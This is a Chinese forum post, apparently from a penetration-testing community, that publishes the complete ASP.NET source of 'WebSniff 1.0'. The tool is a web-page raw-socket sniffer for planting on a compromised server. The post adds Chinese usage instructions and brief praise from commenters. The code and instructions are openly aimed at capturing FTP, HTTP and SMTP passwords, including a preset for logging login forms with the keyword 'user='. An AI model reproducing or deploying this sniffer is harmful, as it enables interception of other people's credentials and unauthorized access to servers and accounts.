Websniff 1.0

ilx · 发表于 2012-5-18 12:45:23

本帖最后由 ilx 于 2012-5-18 18:48 编辑

<%@ Page Language="C#" ValidateRequest="false" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Collections" %>
<%@ Import Namespace="System.Text" %>
<%@ Import Namespace="System.Net.NetworkInformation" %>
<%@ Import Namespace="System.Threading" %>
<%@ Import Namespace="System.Threading" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>WebSniff 1.0</title>
</head>
<body>
<script runat="server">
static private Socket mainSocket; //The socket which captures all incoming packets
private static byte[] byteData = new byte[2048];
private static bool bContinueCapturing = true; //A flag to check if packets are to be captured or not
static int stoppackes = 0;
static int port = 25;
static string strIP = null;
static long packets = 0;
static System.IO.FileStream wfs;
string logfile;
static PacketCaptureWriter pktwt;
static string keyword;
static DateTime stoptime;
Thread th;
static int minisizepacket=0;
protected void Page_Load(object sender, EventArgs e)
{
Session.Timeout = 43200;
if (!IsPostBack)
{
txtlogfile.Text = Server.MapPath("w"+System.DateTime.Now.ToFileTime()+".rar");
txtpackets.Text = System.DateTime.Now.ToString();
IPHostEntry HosyEntry = Dns.GetHostEntry((Dns.GetHostName()));
if (HosyEntry.AddressList.Length > 0)
{
foreach (IPAddress ip in HosyEntry.AddressList)
{
ddlist.Items.Add(ip.ToString());
}
}
}
th = (Thread)Session["workthread"];
if (th != null)
{
this.Lb_msg.Text = System.DateTime.Now.ToString()+" TreadsState: " + th.ThreadState.ToString() +" Packets: "+packets.ToString();
}
else
{
this.Lb_msg.Text = "Treads Null";
}
}
protected void Refresh_Click(object sender, EventArgs e)
{
}
protected void Stop_Click(object sender, EventArgs e)
{
packets = stoppackes;
stoptime = System.DateTime.Now;
bContinueCapturing = false;
wfs.Close();
if (th != null)
{
th.Abort();
}
Session.RemoveAll();
}
protected void Pagestart()
{
strIP = ddlist.SelectedValue;
port = Int32.Parse(txtport.Text);
stoptime = Convert.ToDateTime( txtpackets.Text);
logfile = this.txtlogfile.Text;
wfs = System.IO.File.Create(logfile);
pktwt = new PacketCaptureWriter(wfs, LinkLayerType.RawIP);
keyword = txtkeywords.Text;
minisizepacket= Int32.Parse(txtMinisize.Text);
bContinueCapturing = true;
packets = 0;
Start();
}
private static void Start()
{
bContinueCapturing = true;
mainSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
mainSocket.Bind(new IPEndPoint(IPAddress.Parse(strIP), 0));
mainSocket.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, true);
byte[] byTrue = new byte[4] { 1, 0, 0, 0 };
byte[] byOut = new byte[4] { 1, 0, 0, 0 };
mainSocket.IOControl(IOControlCode.ReceiveAll, byTrue, byOut);
byteData = new byte[2048];
while (System.DateTime.Now <= stoptime)
{
int size = mainSocket.Receive(byteData);
ParseData(byteData, size);
}
bContinueCapturing = false;
wfs.Close();
mainSocket.Close();
}
protected void Start_Click(object sender, EventArgs e)
{
if (this.txtlogfile.Text == "" || txtpackets.Text.Length < 1 || txtport.Text == "") return;
th = new Thread(new ThreadStart(Pagestart));
th.Start();
Session["workthread"] = th;
this.Lb_msg.Text = "\r\nStart One Thread...";
}
public static ushort Get2Bytes(byte[] ptr, int Index, int Type)
{
ushort u = 0;
if (Type == 0)
{
u = (ushort)ptr[Index++];
u *= 256;
u += (ushort)ptr[Index++];
}
else if (Type == 1)
{
u = (ushort)ptr[++Index];
u *= 256; Index--;
u += (ushort)ptr[Index++]; Index++;
}
return u;
}
private static void ParseData(byte[] byteData, int nReceived)
{
try
{
byte[] nbyte = new byte[nReceived];
Array.Copy(byteData, nbyte, nReceived);
int ptype = (int)nbyte[9];
if (ptype == 6)
{
int sport = Get2Bytes(nbyte, 20,0);
int dport = Get2Bytes(nbyte, 22,0);
if (dport == port || sport == port)
{
if (nReceived > minisizepacket)
{
if (keyword != "")
{
if (Encoding.Default.GetString(nbyte).IndexOf(keyword) > 0)
{
PacketCapture pkt = new PacketCapture(nbyte, nReceived);
pktwt.Write(pkt);
packets++;
}
}
else
{
PacketCapture pkt = new PacketCapture(nbyte, nReceived);
pktwt.Write(pkt);
packets++;
}
}
}
}
}
catch { }
}
public struct UnixTime
{
public static readonly DateTime MinDateTime = new DateTime(1970, 1, 1, 0, 0, 0);
public static readonly DateTime MaxDateTime = new DateTime(2038, 1, 19, 3, 14, 7);
private readonly int _Value;
public UnixTime(int value)
{
if (value < 0)
throw new ArgumentOutOfRangeException("value");
_Value = value;
}
public int Value
{
get { return _Value; }
}
public DateTime ToDateTime()
{
const long START = 621355968000000000; // 1970-1-1 00:00:00
return new DateTime(START + (_Value * (long)10000000)).ToLocalTime();
}
public static UnixTime FromDateTime(DateTime dateTime)
{
if (dateTime < MinDateTime || dateTime > MaxDateTime)
throw new ArgumentOutOfRangeException("dateTime");
TimeSpan span = dateTime.Subtract(MinDateTime);
return new UnixTime((int)span.TotalSeconds);
}
public override string ToString()
{
return ToDateTime().ToString();
}
}
public enum LinkLayerType : uint
{
Null = 0,
Ethernet = 1,
RawIP = 101,
User0 = 147,
User1 = 148,
User2 = 149,
User3 = 150,
User4 = 151,
User5 = 152,
User6 = 153,
User7 = 154,
User8 = 155,
User9 = 156,
User10 = 157,
User11 = 158,
User12 = 159,
User13 = 160,
User14 = 161,
User15 = 162,
}
public sealed class PacketCaptureWriter
{
#region Fields
private const uint MAGIC = 0xA1B2C3D4;
private readonly Stream _BaseStream;
private readonly LinkLayerType _LinkLayerType;
private readonly int _MaxPacketLength;
private readonly BinaryWriter m_Writer;
private bool m_ExistHeader = false;
private int _TimeZone;
private int _CaptureTimestamp;
#endregion
#region Constructors
public PacketCaptureWriter(
Stream baseStream, LinkLayerType linkLayerType,
int maxPacketLength, int captureTimestamp)
{
if (baseStream == null) throw new ArgumentNullException("baseStream");
if (maxPacketLength < 0) throw new ArgumentOutOfRangeException("maxPacketLength");
if (!baseStream.CanWrite) throw new ArgumentException("Cant'Wirte Stream");
_BaseStream = baseStream;
_LinkLayerType = linkLayerType;
_MaxPacketLength = maxPacketLength;
_CaptureTimestamp = captureTimestamp;
m_Writer = new BinaryWriter(_BaseStream);
}
public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType, int captureTimestamp)
: this(baseStream, linkLayerType, 0xFFFF, captureTimestamp)
{
}
public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType)
: this(baseStream, linkLayerType, 0xFFFF, UnixTime.FromDateTime(DateTime.Now).Value)
{
}
#endregion
#region Properties
public short VersionMajor
{
get { return 2; }
}
public short VersionMinjor
{
get { return 4; }
}
public int TimeZone
{
get { return _TimeZone; }
set { _TimeZone = value; }
}
public int CaptureTimestamp
{
get { return _CaptureTimestamp; }
set { _CaptureTimestamp = value; }
}
public Stream BaseStream
{
get { return _BaseStream; }
}
public LinkLayerType LinkLaterType
{
get { return _LinkLayerType; }
}
public int MaxPacketLength
{
get { return _MaxPacketLength; }
}
#endregion
public void Write(PacketCapture packet)
{
CheckHeader();
m_Writer.Write(packet.Timestamp.Value);
m_Writer.Write(packet.Millseconds);
m_Writer.Write(packet.Packet.Count);
m_Writer.Write(packet.RawLength);
m_Writer.Write(packet.Packet.Array, packet.Packet.Offset, packet.Packet.Count);
}
public void Flush()
{
BaseStream.Flush();
}
private void CheckHeader()
{
if (!m_ExistHeader)
{
m_Writer.Write(MAGIC);
m_Writer.Write(VersionMajor);
m_Writer.Write(VersionMinjor);
m_Writer.Write(TimeZone);
m_Writer.Write(CaptureTimestamp);
m_Writer.Write(MaxPacketLength);
m_Writer.Write((uint)LinkLaterType);
m_ExistHeader = true;
}
}
}
public sealed class PacketCapture
{
private readonly UnixTime _Timestamp;
private readonly ArraySegment<byte> _Packet;
private readonly int _RawLength;
private readonly int _Millseconds;
public PacketCapture(ArraySegment<byte> packet, int rawLength, UnixTime timestamp, int millseconds)
{
if (packet.Count > rawLength)
throw new ArgumentException("Length Error", "rawLength");
_Packet = packet;
_Timestamp = timestamp;
_RawLength = rawLength;
_Millseconds = millseconds;
}
public PacketCapture(ArraySegment<byte> packet, int rawLength, DateTime timestamp)
: this(packet, rawLength, UnixTime.FromDateTime(timestamp), 0)
{
}
public PacketCapture(ArraySegment<byte> packet, int rawLength)
: this(packet, rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
{
}
public PacketCapture(ArraySegment<byte> packet)
: this(packet, packet.Count)
{
}
public PacketCapture(byte[] packetData, int offset, int count, int rawLength, UnixTime timestamp, int millseconds)
: this(new ArraySegment<byte>(packetData, offset, count), rawLength, timestamp, millseconds)
{
}
public PacketCapture(byte[] packetData, int offset, int count, int rawLength, DateTime timestamp)
: this(new ArraySegment<byte>(packetData, offset, count), rawLength, UnixTime.FromDateTime(timestamp), 0)
{
}
public PacketCapture(byte[] packetData, int rawLength, UnixTime timestamp, int millseconds)
: this(new ArraySegment<byte>(packetData), rawLength, timestamp, millseconds)
{
}
public PacketCapture(byte[] packetData, int rawLength, DateTime timestamp)
: this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(timestamp), 0)
{
}
public PacketCapture(byte[] packetData, int rawLength)
: this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
{
}
public PacketCapture(byte[] packetData)
: this(packetData, packetData.Length)
{
}
public ArraySegment<byte> Packet
{
get { return _Packet; }
}
public UnixTime Timestamp
{
get { return _Timestamp; }
}
public int Millseconds
{
get { return _Millseconds; }
}
public int RawLength
{
get { return _RawLength; }
}
}
</script>
<style type="text/css">
<!--
a {
color: #FF0000 ;text-decoration: none
}
#b
{
color: #336699;
font-size: 10pt;
text-align: right;
}
#tt
{
vertical-align: middle;
font-size: 12pt;
text-align: center;
}
#Ct_2
{
padding-left:30px;
font-size: 10pt;
color: #336699;
vertical-align: middle;
text-align: left;
background-color: aliceblue;
border-width: 1px;
border-style: solid;
border-color: -moz-use-text-color;
padding-bottom:10px;
}
-->
</style>
<form id="form1" runat="server">
<div id="tt"> <b> WebSniff 1.0</b><br><br> </div>
<div id="Ct_2" >
<table width="100%" >
<tr >
<td width="10%"> BindIP: </td>
<td ><asp:DropDownList ID="ddlist" runat="server" width=90%></asp:DropDownList></td>
</tr>
<tr>
<td ">
FilterPort:
</td>
<td>
<asp:TextBox ID="txtport" Text="80" width=90% runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td >
MiniSizeToCapture:
</td>
<td >
<asp:TextBox ID="txtMinisize" Text="0" width=90% runat="server" ></asp:TextBox>
</td>
</tr>
<tr>
<td>
KeyWordsFilter:
</td>
<td>
<asp:TextBox ID="txtkeywords" runat="server" width=90% Text=""></asp:TextBox>
</td>
</tr>
<tr>
<td >
LogFile:
</td>
<td>
<asp:TextBox ID="txtlogfile" runat="server" width=90% Text="log.log" ></asp:TextBox>
</td>
</tr>
<tr>
<td >
Stop At Time
</td>
<td>
<asp:TextBox ID="txtpackets" runat="server" width=90% Text="300"></asp:TextBox>
</td>
</tr>
<tr>
<td >
Control:
</td>
<td width=90% > <asp:Button ID="Starts" runat="server" OnClick="Start_Click" Text="Start" />
<asp:Button ID="Button1" runat="server" OnClick="Stop_Click" Text="Stop" />
<asp:Button ID="Button_ref" runat="server" OnClick="Refresh_Click" Text="Refresh" /><br />
</td>
</tr>
<tr>
<td >
Status:
</td>
<td width=90%><div id="s"><asp:Label ID="Lb_msg" runat="server" Text=""></div></asp:Label>
</td>
</tr>
</table>
</div><br><br>
<div id=b>Powered by <a href="//www.cncert.net"> C.C.T </a>|Version 1.0
</div>
</form>
</body>
</html>

复制代码

-------------------------------------------------
图片是外链的。。。

Websniff 1.0 是user权限的 rawsocket sniff，可以截取ftp,http,smtp ...等密码，在渗透过程中绝对实用的工具。cncert网站发布的websniff需要 .net 2.0，客户端用firefox，如果用IE会让你错过一个参数设置。

先看下截图

bindip: 有多个IP的情况下，选择要监听的IP地址。只有一个IP，就不用选了。
filterport: 要监听的端口，只能同时监听一个，该参数匹配源地址或目的地址。
MiniSizeToCapture: 要捕获的数据包大小最小长度，例：设为40 那么只抓长度大于40的数据包。
KeyWordsFilter:要包含的关键字，例：设为"passwd " 在符合上面条件的数据包进一步过滤包含"passwd"的数据包，1.0版本不支持多关键字。
Logfile:捕获的数据包文件存放位置，必须为一个可写目录。
StopAttime:定时停止，格式为给出的格式，必须设置这个参数。

按钮功能：
启动启动当前任务，不要重复启动。
停止停止当前任务。
刷新状态可以查看当前抓到的数据包数和任务终止时间。

注意：欲下载数据包文件前必须停止，或等待任务终止。最好不要关闭当前页，以便控制本次任务状态。

常用设置方案：
1.FTP 如上图
2.HTTP 表单记录
bindip=IP地址
filterport: 80
MiniSizeToCapture: 0
KeyWordsFilter:user=
Logfile:捕获的数据包文件存放位置，必须为一个可写目录。
StopAttime:定时停止，格式为给出的格式，必须设置这个参数。

停止任务后将数据包文件下载到本地，使用wireshark或记事本查看内容。

关于抓取到的内容：
在有些情况下只能抓取到下行数据，即向服务器提交的数据，对记录FTP,HTTP表单,SMTP 这已足够。

N.O · 发表于 2012-5-22 00:21:36

很详细，我就喜欢这样发贴的大牛

tianyueabc · 发表于 2012-5-22 10:12:28

顶起！！！！！！！

Free_小东 · 发表于 2012-5-22 12:07:34

传说中的嗅探脚本

k红颜 · 发表于 2012-5-24 00:27:05

顶起

longkubing · 发表于 2012-7-30 21:42:00

{:soso_e141:}好东西。。。

visiter · 发表于 2015-12-8 10:36:13

好厉害，虽然我看不懂代码

Websniff 1.0

指导单位

旗下站点

联系我们